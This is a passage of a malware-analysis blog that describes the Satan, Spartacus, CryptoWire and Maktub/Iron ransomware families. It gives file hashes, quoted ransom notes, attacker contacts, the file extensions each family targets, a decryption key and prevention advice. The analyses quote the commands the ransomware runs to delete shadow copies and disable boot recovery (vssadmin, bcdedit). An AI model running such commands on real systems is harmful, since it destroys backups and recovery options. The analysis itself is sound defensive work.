<li>C:\Cryptor.exe</li>
<li>C:\ProgramData\ms.exe</li>
<li>C:\ProgramData\client.exe</li>
<li>C:\Windows\Temp\KSession</li>
</ul>
</div>
<div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Prevention</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
<ul>
<li>Enable UAC</li>
<li>Enable Windows Update, and install updates (especially verify if <a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" target="_blank">MS17-010</a> is installed)</li>
<li>Install an antivirus, and keep it up-to-date and running</li>
<li>Restrict, where possible, access to shares (ACLs)</li>
<li>Create backups! (and test them)</li>
</ul>
<div>
More ransomware prevention can be found <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a>.</div>
</div>
<div>
<br /></div>
</div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
Satan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it does appear the developers of Satan are continuously improving and adding features to its ransomware.</div>
<div>
<br /></div>
<div>
Prevention is always better than disinfection/decryption.</div>
<div>
<br />
<br />
<br />
<br />
<b>IOCs</b><br />
<b><br /></b></div>
<script src="https://otx.alienvault.com/pulse/5adbde5d8d69441f29beae74.js"></script>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com6tag:blogger.com,1999:blog-606282676955748155.post-80598255648935192872018-04-15T17:56:00.000+02:002018-05-07T13:21:43.690+02:00This is Spartacus: new ransomware on the block<br />
In this blog post, we'll analyse Spartacus, one of many new ransomware families popping up in 2018.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
This instance of Spartacus ransomware has the following properties:<br />
<br />
<br />
<ul>
<li><b>MD5</b>; 25dee2e70c931f3fa832a5b189117ce8</li>
<li><b>SHA1</b>; a01294ffd541229718948e17f791694efb596123</li>
<li><b>SHA256</b>; ef25bdbcf05fa478df3ddc5f4f717c070e443da04cfc590d44409c815f237cb3</li>
<li><b>Compilation timestamp</b>: 2018-01-19 20:36:44</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/ef25bdbcf05fa478df3ddc5f4f717c070e443da04cfc590d44409c815f237cb3/analysis/" target="_blank">ef25bdbcf05fa478df3ddc5f4f717c070e443da04cfc590d44409c815f237cb3</a></li>
</ul>
<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-fq58IHqHMuA/WtNxsLvpUZI/AAAAAAAACAk/c8lPQ31U-5IqT6bQrJa9_l96p0tT0qjRQCLcBGAs/s1600/Spartacus.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="916" data-original-width="1493" height="245" src="https://4.bp.blogspot.com/-fq58IHqHMuA/WtNxsLvpUZI/AAAAAAAACAk/c8lPQ31U-5IqT6bQrJa9_l96p0tT0qjRQCLcBGAs/s400/Spartacus.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Spartacus ransomware message</td></tr>
</tbody></table>
<br />
The message reads:<br />
<br />
<blockquote class="tr_bq">
<i>All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us the e-mail:<br />MastersRecovery@protonmail.com and send personal ID KEY:<br />In case of no answer in 24 hours us to theese e-mail: MastersRecovery@cock.li</i></blockquote>
<br />
The user may send up to 5 files for free decryption, as "guarantee". There's also a warning message at the end of the ransomware screen:<br />
<br />
<blockquote class="tr_bq">
<i>Do not rename encrypted files.<br />Do not try decrypt your data using party software, it may cause permanent data loss.<br />Decryption of your files with the help of thrid parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</i></blockquote>
<br />
Spartacus will encrypt files, regardless of extension, in the following folders:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-pt54aMYXoD4/WtNxsAOmexI/AAAAAAAACA0/Nrod7gbMPGIjAPjxzJPvAMmMkVPunb9OQCEwYBhgL/s1600/Folders.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="292" data-original-width="650" height="178" src="https://3.bp.blogspot.com/-pt54aMYXoD4/WtNxsAOmexI/AAAAAAAACA0/Nrod7gbMPGIjAPjxzJPvAMmMkVPunb9OQCEwYBhgL/s400/Folders.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Target folders to encrypt</td></tr>
</tbody></table>
<br />
Generating the key:<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8dW-SUVw86k/WtNxsLfJhWI/AAAAAAAACA4/11U-S2pgA3MXnlFeVTZ406rNUze90jBwwCEwYBhgL/s1600/RNG.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="344" data-original-width="764" height="180" src="https://4.bp.blogspot.com/-8dW-SUVw86k/WtNxsLfJhWI/AAAAAAAACA4/11U-S2pgA3MXnlFeVTZ406rNUze90jBwwCEwYBhgL/s400/RNG.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - KeyGenerator</td></tr>
</tbody></table>
<br />
As far as I'm aware, Spartacus is the first ransomware who explicitly <i>asks</i> you to send the public key (ID KEY), rather than just sending an email, including the Bitcoin address straight away, or sending the key automatically.<br />
<br />
Encrypted files will get the extension appended as follows:<br />
<b>.[MastersRecovery@protonmail.com].Spartacus </b><br />
<br />
For example:<br />
Penguins.jpg.[MastersRecovery@protonmail.com].Spartacus<br />
<br />
It will also drop the ransomware note, "READ ME.txt" in several locations, such as the user's Desktop:<br />
<br />
<blockquote class="tr_bq">
<i>All your data has been locked us. You want to return? Write email MastersRecovery@protonmail.com or MastersRecovery@cock.li Your personal ID KEY: DvQ9/mvfT3I7U847uKcI0QU3QLd+huv5NOYT2YhfiySde0vhmkzyTtRPlcu73BAJILIPdALjAIy5NLxBHckfyV2XS+GXdjlHMx2V/VEfj4BrZkLB3BQtEdAqS1d2yzb/2+AqTNjsRfZ99ZWVxUZO3AeEZk5h0+3hNM5GogUN2oV5zHkbMZuDaXZxQr56r8UKnW7gmSycdcJh2ueZMuEP1tAuuzdZYgmZ05x9ZT8FX9HIo03rwsi6UiJlgUTZCkiilZjxYyG+qVE+Gjk4H7dnXbQP1PC3k2WICA9R4TYb9SCdv8U/e5sxbuKAbJgEZ114liwHLasmLvQfKYSbxMlbEg==</i></blockquote>
<br />
Interestingly enough, Spartacus also embeds what appears to be a hardcoded and private RSA key:<br />
<br />
<blockquote class="tr_bq">
<i><rsakeyvalue><modulus>xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==</modulus><exponent>AQAB</exponent></rsakeyvalue></i></blockquote>
<br />
Spartacus will delete Shadow Volume Copies by issuing the following command:<br />
<br />
<blockquote class="tr_bq">
<i>cmd.exe /c vssadmin.exe delete shadows /all /quiet</i></blockquote>
<br />
A unique mutex of "<b>Test</b>" will be created in order to not run the ransomware twice, and Spartacus will also continuously keep the ransomware screen or message from running in the foreground or on top, using the <a href="http://setforegroundwindow/" target="_blank">SetForegroundWindow</a> function:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ooqEvpzYC1s/WtO1QaFc1VI/AAAAAAAACBE/R0Qj4EJaZwE07Fb2siPewcA5iWcZ5hbLQCLcBGAs/s1600/Foreground.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="154" data-original-width="585" height="105" src="https://3.bp.blogspot.com/-ooqEvpzYC1s/WtO1QaFc1VI/AAAAAAAACBE/R0Qj4EJaZwE07Fb2siPewcA5iWcZ5hbLQCLcBGAs/s400/Foreground.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Ransom will stay on top and annoy the user</td></tr>
</tbody></table>
<br />
<br />
<br />
Repeating, email addresses used are:<br />
<br />
<blockquote class="tr_bq">
<i>MastersRecovery@protonmail.com<br />MastersRecovery@cock.li</i></blockquote>
<br />
Decryption may be possible if the ransomware is left running, by extracting the key from memory.<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
Spartacus is again another ransomware family or variant popping up.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8fUUNvR3AU4/WtNxdYzbvRI/AAAAAAAACAw/mKlcfWvk8nUK2IolqoXGNuDrqFUdXyCKwCEwYBhgL/s1600/AAAAAAAAAA.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="262" data-original-width="487" height="172" src="https://4.bp.blogspot.com/-8fUUNvR3AU4/WtNxdYzbvRI/AAAAAAAACAw/mKlcfWvk8nUK2IolqoXGNuDrqFUdXyCKwCEwYBhgL/s320/AAAAAAAAAA.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Meme</td></tr>
</tbody></table>
<br />
Make sure to read the dedicated page on <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">ransomware prevention</a> to prevent Spartacus or any other ransomware.<br />
<br />
<br />
<br />
<b>IOCs</b>
<br />
<script src="https://otx.alienvault.com/pulse/5ad377fb2254cc12b8145b99.js"></script>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-37474453670967281112018-04-12T22:55:00.003+02:002018-04-13T10:11:40.664+02:00CryptoWire ransomware not dead<br />
CryptoWire is an "open-source" ransomware based on the AutoIT scripting language, and has been around since 2016. For some background, read the following post on Bleeping Computer:<br />
<a href="https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" target="_blank">"Proof of Concept" CryptoWire Ransomware Spawns Lomix and UltraLocker Families</a><br />
<br />
I already encountered a CryptoWire variant last year, when it was used to target users in Brazil:<br />
<a href="https://bartblaze.blogspot.co.uk/2017/04/ransomware-fala-serio.html" target="_blank">Ransomware, fala sério!</a><br />
<br />
In this blog post, we'll briefly analyse another, recent, CryptoWire sample.<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
This CryptoWire variant has the following properties:<br />
<br />
<ul>
<li>MD5: f6d01e72a58a8bdf14f9a103250f779e</li>
<li>SHA1: 3b97bac22a04282ebbaef60beb168a41e4449239</li>
<li>SHA256: 4deff7d8434583ea8e5c3ef9b4c64674dfb165b1720ddf63b5abdd8ed6a7399c</li>
<li>Compilation timestamp: 2018-04-10 16:00:12</li>
<li>VirusTotal report:<br /><a href="https://www.virustotal.com/en/file/4deff7d8434583ea8e5c3ef9b4c64674dfb165b1720ddf63b5abdd8ed6a7399c/analysis/" target="_blank">4deff7d8434583ea8e5c3ef9b4c64674dfb165b1720ddf63b5abdd8ed6a7399c</a></li>
</ul>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-sTs8nqbQ0U8/Ws_F_u2d9CI/AAAAAAAACAQ/_sGI22UFNf8EMPiTbvldhJEcnltSqeO7QCLcBGAs/s1600/CryptoWire.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1183" data-original-width="1414" height="267" src="https://2.bp.blogspot.com/-sTs8nqbQ0U8/Ws_F_u2d9CI/AAAAAAAACAQ/_sGI22UFNf8EMPiTbvldhJEcnltSqeO7QCLcBGAs/s320/CryptoWire.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Typical CryptoWire layout</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The message reads:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>The only way you can recover your files is to buy a decryption key<br />The payment method is: Bitcoins. The price is: $1000 = Bitcoins<br />When you are ready, send a message by email to wlojul@secmail.pro<br />We will send you our BTC wallet for the transfer<br />After confirmation we will send you the decryption key<br />Click on the 'Buy decryption key' button.</i></blockquote>
</div>
<div>
<br /></div>
<div>
CryptoWire will encrypt files with the following extensions (282 total):</div>
<div>
<br /></div>
<div>
3fr, 7z, EPS, M3U, M4A, PEM, PSD, WPS, XLSX, abw, accdb, afsnit, ai, aif, arc, arw, as, asc, asd, asf, ashdisc, asm, asp, aspx, asx, aup, avi, bay, bbb, bdb, bibtex, bkf, bmp, bmp, bpn, btd, bz2, c, cdi, cdr, cer, cert, cfm, cgi, cpio, cpp, cr2, crt, crw, csr, cue, dbf, dcr, dds, dem, der, dmg, dng, doc, docm, docx, dsb, dwg, dxf, dxg, eddx, edoc, eml, emlx, eps, epub, erf, fdf, ffu, flv, gam, gcode, gho, gpx, gz, h, hbk, hdd, hds, himmel, hpp, ics, idml, iff, img, indd, ipd, iso, isz, iwa, j2k, jp2, jpeg, jpf, jpg, jpm, jpx, jsp, jspa, jspx, jst, kdc, key, keynote, kml, kmz, lic, lwp, lzma, m4v, max, mbox, md2, mdb, mdbackup, mddata, mdf, mdinfo, mds, mef, mid, mov, mp3, mp4, mpa, mpb, mpeg, mpg, mpj, mpp, mrw, msg, mso, nba, nbf, nbi, nbu, nbz, nco, nef, nes, note, nrg, nri, nrw, odb, odc, odm, odp, ods, odt, ogg, one, orf, ova, ovf, oxps, p12, p2i, p65, p7, p7b, p7c, pages, pct, pdd, pdf, pef, pem, pfx, php, php3, php4, php5, phps, phpx, phpxx, phtm, phtml, pl, plist, pmd, pmx, png, ppdf, pps, ppsm, ppsx, ppt, pptm, pptx, ps, psd, pspimage, pst, ptx, pub, pvm, qcn, qcow, qcow2, qt, r3d, ra, raf, rar, raw, rm, rtf, rtf, rw2, rwl, s, sbf, set, skb, slf, sme, smm, snp, spb, sql, sr2, srf, srt, srw, ssc, ssi, stg, stl, svg, swf, sxw, syncdb, tager, tc, tex, tga, thm, tif, tiff, til, toast, torrent, txt, vbk, vcard, vcd, vcf, vdi, vfs4, vhd, vhdx, vmdk, vob, vsdx, wav, wb2, wbk, wbverify, webm, wmb, wpb, wpd, wps, x3f, xdw, xlk, xlr, xls, xlsb, xlsm, xlsx, xz, yuv, zip, zipx</div>
<div>
<br /></div>
<div>
It will also encrypt files, regardless of extension, in certain folders such as Desktop.</div>
<div>
<br /></div>
<div>
Files are encrypted with AES, and prepends extension of encrypted files with ".encrypted.". For example: Tulips.<b>encrypted</b>.png.</div>
<div>
<br /></div>
<div>
CryptoWire will delete Shadow Volume Copies and disable BCDEdit by executing these commands:<br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<i>vssadmin.exe Delete Shadows /All /Quiet</i><i>bcdedit /set {default} recoveryenabled No</i><i>bcdedit /set {default} bootstatuspolicy ignoreallfailures</i></blockquote>
</blockquote>
<br />
It will additionally create a scheduled task for persistence.</div>
<div>
<br /></div>
<div>
You can decrypt files for this specific variant with the following Decryption Key:<br />
<b>VgjRPoOM0oa92_jId!/wkMeW6,guuSe</b></div>
<div>
<b><br /></b></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
Some ransomware variants simply do not die, one example of these appears to be CryptoWire. If you have been hit by this particular strain, use the decryption key as instructed above, and your files will be decrypted.</div>
<div>
<br /></div>
<div>
Make sure to read the dedicated page on <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">ransomware prevention</a> to prevent CryptoWire or any other "open-source" ransomware to infect your machine, and encrypt your files.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs</b></div>
<script src="https://otx.alienvault.com/pulse/5acfc910b96990681863b4f5.js"></script>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-48323503525447270512018-04-10T21:15:00.000+02:002019-11-10T13:32:07.066+01:00Maktub ransomware: possibly rebranded as Iron<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
In this post, we'll take a quick look at a possible new ransomware variant, which appears to be the latest version of Maktub ransomware, also known as Maktub Locker.<br />
<br />
<a href="https://twitter.com/hasherezade" target="_blank">Hasherazade</a> from Malwarebytes has, as per usual, written an excellent blog on Maktub Locker in the past, if you wish to learn more: <a href="https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" target="_blank">Maktub Locker – Beautiful And Dangerous</a><br />
<br />
<b><span style="color: orange;">Update - 2018-04-14</span></b>: Read the conclusion at the end of this post to learn more about how Iron ransomware mimicked at least three different ransomware families.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
A file was discovered, named <i>ado64</i> with the following properties:<br />
<br />
<br />
<ul>
<li><b>MD5</b>: 1e60050db59e3d977d2a928fff3d34a6</li>
<li><b>SHA1</b>: f51bab89b4e4510b973df8affc2d11a4476bd5be</li>
<li><b>SHA256</b>: 19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770</li>
<li><b>Compilation timestamp</b>: 2018-04-05 03:47:19</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770/analysis/1523265965/" target="_blank">19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770</a></li>
</ul>
<div>
<br /></div>
<div>
Maktub typically sports a graphically appealing lock screen, as well as payment portal, and promotes "Maktub Locker" extensively. </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Interestingly enough, this variant has removed all references to Maktub. The figures below represent lock screen and payment portal, when stepping through.</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-WAlX00ifOVY/Ws0B6jrnViI/AAAAAAAAB_I/3KQBa0NrOSARlFIegUUkq742HEH7jBYGACLcBGAs/s1600/r0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="686" data-original-width="674" height="320" src="https://1.bp.blogspot.com/-WAlX00ifOVY/Ws0B6jrnViI/AAAAAAAAB_I/3KQBa0NrOSARlFIegUUkq742HEH7jBYGACLcBGAs/s320/r0.PNG" width="314" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Lock screen/warning<br />
<br /></td></tr>
</tbody></table>
Email address: <i>recoverfile@mail2tor.com</i><br />
<div>
Bitcoin address: <i>1cimKyzS64PRNEiG89iFU3qzckVuEQuUj</i><br />
Ransomware note: <i>!HELP_YOUR_FILES.HTML</i><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-JYQbqrFMABc/Ws0CrZaEu3I/AAAAAAAAB_g/5q9bm8aTskkGrBoLmkLi1YUoBOinw1RhQCLcBGAs/s1600/r_id.PNG" imageanchor="1" style="font-size: medium; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="215" data-original-width="779" height="88" src="https://2.bp.blogspot.com/-JYQbqrFMABc/Ws0CrZaEu3I/AAAAAAAAB_g/5q9bm8aTskkGrBoLmkLi1YUoBOinw1RhQCLcBGAs/s320/r_id.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Payment portal<br />
<br /></td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-f84vjna_d4s/Ws0BeXxIfnI/AAAAAAAAB-w/WjUuCnM4NbkzfNymbKKvtj_4_T5o8n-6ACLcBGAs/s1600/r1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="799" data-original-width="978" height="261" src="https://3.bp.blogspot.com/-f84vjna_d4s/Ws0BeXxIfnI/AAAAAAAAB-w/WjUuCnM4NbkzfNymbKKvtj_4_T5o8n-6ACLcBGAs/s320/r1.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Figure 3 - Hello! (after entering the personal ID)</td></tr>
</tbody></table>
<div class="separator" style="clear: both; font-size: medium;">
</div>
</td></tr>
</tbody></table>
The text reads:<br />
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>We’re very sorry that all of your personal files have been encrypted :( But there are good news – they aren’t gone, you still have the opportunity to restore them! Statistically, the lifespan of a hard-drive is anywhere from 3 to 5 years. If you don’t make copies of important information, you could lose everything! Just imagine! In order to receive the program that will decrypt all of your files, you will need to pay a certain amount. But let’s start with something else…</i></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-d4I-9W0OrSE/Ws0BeTvjsHI/AAAAAAAAB-4/lfnSJlo2x2Q9owX1DiLmhhGVNPUAqDmlACLcBGAs/s1600/r2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="735" data-original-width="967" height="243" src="https://4.bp.blogspot.com/-d4I-9W0OrSE/Ws0BeTvjsHI/AAAAAAAAB-4/lfnSJlo2x2Q9owX1DiLmhhGVNPUAqDmlACLcBGAs/s320/r2.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Figure 4 - "We are not lying"</td></tr>
</tbody></table>
<div class="separator" style="clear: both; font-size: medium;">
</div>
</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-EVMOjtrOle8/Ws0Be2VNkPI/AAAAAAAAB-8/Wr6JzHmcFecpIiM4GAxdYzk_t4z8AxRlQCLcBGAs/s1600/r3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="690" data-original-width="944" height="233" src="https://1.bp.blogspot.com/-EVMOjtrOle8/Ws0Be2VNkPI/AAAAAAAAB-8/Wr6JzHmcFecpIiM4GAxdYzk_t4z8AxRlQCLcBGAs/s320/r3.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Ransomware cost</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-GJynOkFvcEg/Ws0BfEx6QeI/AAAAAAAAB_A/wQFz9mp1rYk_y5WOLGh-SPf-g-WAmIWFACLcBGAs/s1600/r4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="552" data-original-width="987" height="178" src="https://1.bp.blogspot.com/-GJynOkFvcEg/Ws0BfEx6QeI/AAAAAAAAB_A/wQFz9mp1rYk_y5WOLGh-SPf-g-WAmIWFACLcBGAs/s320/r4.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - Where to pay</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-l1iZrqLQr4Q/Ws0BfBeBdFI/AAAAAAAAB_E/43dQV6gYjZQbxpP-SpsZNje1EfApZS2JgCLcBGAs/s1600/r5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="753" data-original-width="1247" height="193" src="https://2.bp.blogspot.com/-l1iZrqLQr4Q/Ws0BfBeBdFI/AAAAAAAAB_E/43dQV6gYjZQbxpP-SpsZNje1EfApZS2JgCLcBGAs/s320/r5.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Figure 7- Last but not least: how to buy Bitcoins<br />
<br />
<br /></td></tr>
</tbody></table>
</td></tr>
</tbody></table>
In previous versions of Maktub, you could decrypt 1 file for free, however, with the current rebranding, this option has disappeared. Since the ransomware has rebranded, we'll name it "Iron" or "Iron ransomware", due to the name of the decrypter, <i>IronUnlocker</i>.<br />
<br />
Iron encrypts a whopping total of <b>374</b> extensions, these are as follows:<br />
<br />
<blockquote class="tr_bq">
<i>.001, .1cd, .3fr, .8ba, .8bc, .8be, .8bf, .8bi8, .8bl, .8bs, .8bx, .8by, .8li, .DayZProfile, .abk, .ade, .adpb, .adr, .aip, .amxx, .ape, .api, .apk, .arch00, .aro, .arw, .asa, .ascx, .ashx, .asmx, .asp, .asr, .asset, .bar, .bay, .bc6, .bc7, .bi8, .bic, .big, .bin, .bkf, .bkp, .blob, .blp, .bml, .bp2, .bp3, .bpl, .bsa, .bsp, .cab, .cap, .cas, .ccd, .cch, .cer, .cfg, .cfr, .cgf, .chk, .class, .clr, .cms, .cod, .col, .con, .cpp, .cr2, .crt, .crw, .csi, .cso, .css, .csv, .ctt, .cty, .cwf, .d3dbsp, .dal, .dap, .das, .db0, .dbb, .dbf, .dbx, .dcp, .dcr, .dcu, .ddc, .ddcx, .dem, .der, .desc, .dev, .dex, .dic, .dif, .dii, .disk, .dmg, .dmp, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .dvd, .dxg, .elf, .epk, .eql, .erf, .esm, .f90, .fcd, .fla, .flp, .for, .forge, .fos, .fpk, .fpp, .fsh, .gam, .gdb, .gho, .grf, .h3m, .h4r, .hkdb, .hkx, .hplg, .htm, .html, .hvpl, .ibank, .icxs, .img, .indd, .ipa, .iso, .isu, .isz, .itdb, .itl, .itm, .iwd, .iwi, .jar, .jav, .java, .jpe, .kdc, .kmz, .layout, .lbf, .lbi, .lcd, .lcf, .ldb, .ldf, .lgp, .litemod, .lng, .lrf, .ltm, .ltx, .lvl, .m3u, .m4a, .map, .mbx, .mcd, .mcgame, .mcmeta, .md0, .md1, .md2, .md3, .mdb, .mdbackup, .mddata, .mdf, .mdl, .mdn, .mds, .mef, .menu, .mm6, .mm7, .mm8, .moz, .mpq, .mpqge, .mrwref, .mxp, .ncf, .nds, .nrg, .nri, .nrw, .ntl, .odb, .odf, .odp, .ods, .odt, .orf, .owl, .oxt, .p12, .p7b, .p7c, .pab, .pbp, .pef, .pem, .pfx, .pkb, .pkh, .pkpass, .plc, .pli, .pot, .potm, .potx, .ppf, .ppsm, .pptm, .prc, .prt, .psa, .pst, .ptx, .pwf, .pxp, .qbb, .qdf, .qel, .qic, .qpx, .qtr, .r3d, .raf, .re4, .res, .rgn, .rgss3a, .rim, .rofl, .rrt, .rsrc, .rsw, .rte, .rw2, .rwl, .sad, .sav, .sc2save, .scm, .scx, .sdb, .sdc, .sds, .sdt, .shw, .sid, .sidd, .sidn, .sie, .sis, .slm, .slt, .snp, .snx, .spr, .sql, .sr2, .srf, .srw, .std, .stt, .sud, .sum, .svg, .svr, .swd, .syncdb, .t01, .t03, .t05, .t12, .t13, .tar.gz, .tax, .tcx, .thmx, .tlz, .tor, .torrent, .tpu, .tpx, .ttarch2, .tur, .txd, .txf, .uax, .udf, .umx, .unity3d, .unr, .uop, .upk, .upoi, .url, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vcd, .vdf, .ver, .vfs0, .vhd, .vmf, .vmt, .vpk, .vpp_pc, .vsi, .vtf, .w3g, .w3x, .wad, .war, .wb2, .wdgt, .wks, .wmdb, .wmo, .wotreplay, 